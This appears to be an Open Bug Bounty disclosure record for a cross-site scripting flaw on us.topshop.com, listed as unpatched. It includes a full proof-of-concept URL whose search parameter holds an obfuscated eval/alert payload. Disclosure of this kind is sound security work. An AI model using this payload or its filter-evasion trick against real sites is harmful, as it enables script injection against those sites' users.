us.topshop.com XSS vulnerability

2015-07-30T02:41:00
ID OBB:76691
Type openbugbounty
Reporter nopernik
Modified 2015-07-30T02:43:00

Description

Vulnerable URL:
http://us.topshop.com/webapp/wcs/stores/servlet/CatalogNavigationSearchResultCmd?langId=-1&storeId;=13058&catalogId;=34058&Dy;=1&Nty;=1&beginIndex;=1&pageSize;=20&Nrpp;=20&pageNum;=1&Ntt;=%22-eval%28%22al%22%2b%22e%22%2b%22rt%28\%22xssposed\%22%29%22%29%28%29-%22&geoip;=noredirect
Details:

Description| Value
---|---
Patched:| No
Latest check for patch:| 25.07.2017
Vulnerability type:| XSS
Vulnerability status:| Publicly disclosed
Alexa Rank| Unknown / Not calculated
Google Pagerank| 5
VIP website status:| No
Check us.topshop.com SSL connection:| (Grade: A)

Coordinated Disclosure Timeline:

Description| Value
---|---
Vulnerability reported| 30 July, 2015 02:41 GMT
Vulnerability existence verified and confirmed| 30 July, 2015 02:43 GMT